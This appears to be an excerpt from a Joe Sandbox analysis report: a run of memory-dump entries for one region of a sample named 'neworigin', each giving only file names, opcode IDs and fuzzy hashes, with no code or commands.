                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000018.00000002.4588748090.0000000006410000.00000040.00000800.00020000.00000000.sdmp, Offset: 06410000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_24_2_6410000_neworigin.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 232cfc705d14c977b432b5cc2b6e19207b5555552947bb0cc08fafcf769f49ef
                                                                                                                  • Instruction ID: dba1daaac11b247192adbad0e6cdde73aca8c73267d9f440ea13ac8fa6993464
                                                                                                                  • Opcode Fuzzy Hash: 232cfc705d14c977b432b5cc2b6e19207b5555552947bb0cc08fafcf769f49ef
                                                                                                                  • Instruction Fuzzy Hash: 20B18374F101098FEF65DB68D5947AFB7B6EB89310F21842AE409EB391CB34DC828752
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000018.00000002.4588748090.0000000006410000.00000040.00000800.00020000.00000000.sdmp, Offset: 06410000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_24_2_6410000_neworigin.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 68f2b991f571df95e4e5829f2542e615438379e468c4678aab29639d51a0d1e1
                                                                                                                  • Instruction ID: 5eb5631138a9afbdef7534a397251e4008a724527d12fbe69595a5607169fdea
                                                                                                                  • Opcode Fuzzy Hash: 68f2b991f571df95e4e5829f2542e615438379e468c4678aab29639d51a0d1e1
                                                                                                                  • Instruction Fuzzy Hash: 2861BF71F000214FDF55AA6AC88066FBADBAFD4220B25447AE80EDB364DE75DD0287D1
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000018.00000002.4588748090.0000000006410000.00000040.00000800.00020000.00000000.sdmp, Offset: 06410000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_24_2_6410000_neworigin.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 3da88654f7c4458b3bedb2a48d2c946c927fe9ead925a2decdf778f4158073bd
                                                                                                                  • Instruction ID: b959bec86c937c5b140e14703e5dad94132122248ca57c5b09730db9b8dc2abe
                                                                                                                  • Opcode Fuzzy Hash: 3da88654f7c4458b3bedb2a48d2c946c927fe9ead925a2decdf778f4158073bd
                                                                                                                  • Instruction Fuzzy Hash: C1913E34E102198BDF61DF64C890BDEB7B1FF89300F208596D549AB395DB70AA85CF91
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000018.00000002.4588748090.0000000006410000.00000040.00000800.00020000.00000000.sdmp, Offset: 06410000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_24_2_6410000_neworigin.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: a6f529dd1b68511dd3b6edf17616f7bc3661cd09b8ff522431147d3c62857869
                                                                                                                  • Instruction ID: a3358e297266978e35cdd01048430f9536e0dd00ae173a73a5fafc0729ea9413
                                                                                                                  • Opcode Fuzzy Hash: a6f529dd1b68511dd3b6edf17616f7bc3661cd09b8ff522431147d3c62857869
                                                                                                                  • Instruction Fuzzy Hash: 87912D34E102198BDF60DF64C890B9DB7B1FF89310F208596D549BB355DB70AA85CF51
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000018.00000002.4588748090.0000000006410000.00000040.00000800.00020000.00000000.sdmp, Offset: 06410000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_24_2_6410000_neworigin.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 3e45158a20ab10337e07086f4413c184c0c1f2c41091eff8de6c7628612b59ac
                                                                                                                  • Instruction ID: 20d9cd39a530470e46f6ee234afa34efcdc33e99f7fad986375dc4ffddf0a4e3
                                                                                                                  • Opcode Fuzzy Hash: 3e45158a20ab10337e07086f4413c184c0c1f2c41091eff8de6c7628612b59ac
                                                                                                                  • Instruction Fuzzy Hash: 34510B74B202054BEFA66B6CD85477F2B9AE78D310F20442BE50BCB3D5CA69CC579392
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000018.00000002.4588748090.0000000006410000.00000040.00000800.00020000.00000000.sdmp, Offset: 06410000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_24_2_6410000_neworigin.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 423f9c9e80bf378bef52296ad796e18112067f08a31c3d28f2560e74bb0fddac
                                                                                                                  • Instruction ID: 3f27b2c5df80135b2535c29b89e4fc2110cfb244c500ad6cdd94ced4a6ad938e
                                                                                                                  • Opcode Fuzzy Hash: 423f9c9e80bf378bef52296ad796e18112067f08a31c3d28f2560e74bb0fddac
                                                                                                                  • Instruction Fuzzy Hash: 4851EB74B201058BEFA66BACD85473F269AE78D350F20442BE50BCB3D4CA69CC565392
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000018.00000002.4588748090.0000000006410000.00000040.00000800.00020000.00000000.sdmp, Offset: 06410000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_24_2_6410000_neworigin.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 6ddff90816e3b0b240748f9c040af2e43d7078c6646aa410a040a613dc235bdf
                                                                                                                  • Instruction ID: fb376cd8b8efb97e4479e721f19f9c66440eb298d2982a17c9a3624fa4798399
                                                                                                                  • Opcode Fuzzy Hash: 6ddff90816e3b0b240748f9c040af2e43d7078c6646aa410a040a613dc235bdf
                                                                                                                  • Instruction Fuzzy Hash: 8A01F132B004140BCB9A9AFCC854B6F77D6DBCA310B14442AE40ACF390DA25DD0B83A2
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000018.00000002.4588748090.0000000006410000.00000040.00000800.00020000.00000000.sdmp, Offset: 06410000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_24_2_6410000_neworigin.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 6d39e5116bd089b5ee3b67e84cefb2ac01982e4143d7351e7c4d1812e315cb5d
                                                                                                                  • Instruction ID: c439d960c427e77e6deae31fa9b3275778989386879ec33209910810a3efca7e
                                                                                                                  • Opcode Fuzzy Hash: 6d39e5116bd089b5ee3b67e84cefb2ac01982e4143d7351e7c4d1812e315cb5d
                                                                                                                  • Instruction Fuzzy Hash: C101B135B101140BDB5696BCC41976FA7E6CBC6711F25883BE44DCB795DD24DC0383A2
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000018.00000002.4588748090.0000000006410000.00000040.00000800.00020000.00000000.sdmp, Offset: 06410000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_24_2_6410000_neworigin.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: e331858fc03764f69c6da35899dbd656759a673fcba62a1dd4207e13c54d29bb
                                                                                                                  • Instruction ID: df17fafadb705734d4b725fef5a437db211017c4b289bb8ba5d8c4ff38d718b3
                                                                                                                  • Opcode Fuzzy Hash: e331858fc03764f69c6da35899dbd656759a673fcba62a1dd4207e13c54d29bb
                                                                                                                  • Instruction Fuzzy Hash: 79018131B100180BDB6696ADD41972FA7EACBCA725F24883BF50ECB794ED65DC0343A1
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000018.00000002.4588748090.0000000006410000.00000040.00000800.00020000.00000000.sdmp, Offset: 06410000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_24_2_6410000_neworigin.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: eaed6d95e3127a636c0a3b9806353de442acab72aa65495884867fce77306694
                                                                                                                  • Instruction ID: 556364f04f3b1b435e7a63f82e3f51c92d4e8f11331916fa8c7f243c014e8c63
                                                                                                                  • Opcode Fuzzy Hash: eaed6d95e3127a636c0a3b9806353de442acab72aa65495884867fce77306694
                                                                                                                  • Instruction Fuzzy Hash: EE01FF32B104140BDBAA9ABDD494B6F77D6DBCA720F24883AF50ACB340DE25DC074386
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000018.00000002.4588748090.0000000006410000.00000040.00000800.00020000.00000000.sdmp, Offset: 06410000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_24_2_6410000_neworigin.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 45cac9ae1c5c5763688eaa44d04273bc4c12aa39bad5b7ec48d48bf8510244f6
                                                                                                                  • Instruction ID: e124179e2d6e7008202cf97023470eb3ad926a551e2ce7eb46ab778cb3507c33
                                                                                                                  • Opcode Fuzzy Hash: 45cac9ae1c5c5763688eaa44d04273bc4c12aa39bad5b7ec48d48bf8510244f6
                                                                                                                  • Instruction Fuzzy Hash: 94F0622031D2A04FD785AB398864A593FB69F86600F1540FFE059CB7E3CD65DC098B91
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000018.00000002.4588748090.0000000006410000.00000040.00000800.00020000.00000000.sdmp, Offset: 06410000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_24_2_6410000_neworigin.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: b79e46b1fc2f64171f5ba6d984add0984fb62d12fda174a3264f307ab5978bdd
                                                                                                                  • Instruction ID: 17ce040508b0984f649a8143c69ee0d2ce6e42f5ac3115b906e63091857cca15
                                                                                                                  • Opcode Fuzzy Hash: b79e46b1fc2f64171f5ba6d984add0984fb62d12fda174a3264f307ab5978bdd
                                                                                                                  • Instruction Fuzzy Hash: E4E065303100204BD7C8A769C824B5D3BA69FC8A00F0080BEA519CB3E1CDB5DC054BC4